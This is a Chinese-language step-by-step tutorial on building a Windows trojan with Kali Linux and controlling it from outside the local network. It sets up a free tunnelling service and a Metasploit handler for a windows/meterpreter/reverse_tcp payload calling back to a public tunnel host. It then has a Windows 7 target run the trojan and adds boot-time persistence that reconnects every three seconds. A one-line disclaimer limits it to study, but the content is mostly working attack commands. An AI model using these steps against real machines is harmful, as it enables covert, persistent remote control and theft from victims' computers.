Kali linux windows木马（外网) 保姆级教学

前言

实现外网控制需要一个外网的IP负责监听，本次使用的是https://www.fgnwct.com（飞鸽内网穿透）有免费的隧道 kali.org(kali官网) 详细教程查询官网。

此系列仅用于工作和学习，禁止用于非法攻击。一切遵守《网络安全法》

环境 windows7 kali linux 2021

1. 下载客户端，解压出文件 ''NPC''

1. 放到kali linux 里面

1. 这里选择 tcp协议，本地端口随意填（最好不要填常用的可能被占用的端口）

1. 复制命令，打开kali

1. 网络选择（桥接模式）

1. 拖入kali桌面

1. 在kali终端里面启动（要和npc文件在同一个路径下！）成功连上服务器

1. 创建一个木马，这里要填服务器的！

1. 打开msfconsole（输入以下命令）

use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
set lhost [公网服务器的名称 如：free.svipss.top]
set lport [自己设置的隧道端口]
run

1. 在Windows7运行木马

1. 回到kali 木马连接成功

1. 如果想要 木马持久化连接要用到别的模块

run persistence -X -i 3 -r [公网服务器名称 如：free.svipss.top] -p [公网端口]
-X                 //开机自启动
-i                 //回连的时间间隔 （-i 3 代表每3秒钟连接我们一次）
-r                 //目标机器 IP 地址（攻击主机）
-p                 //监听反向连接端口号

注（需要在windows7靶机上重启计算机才能实现）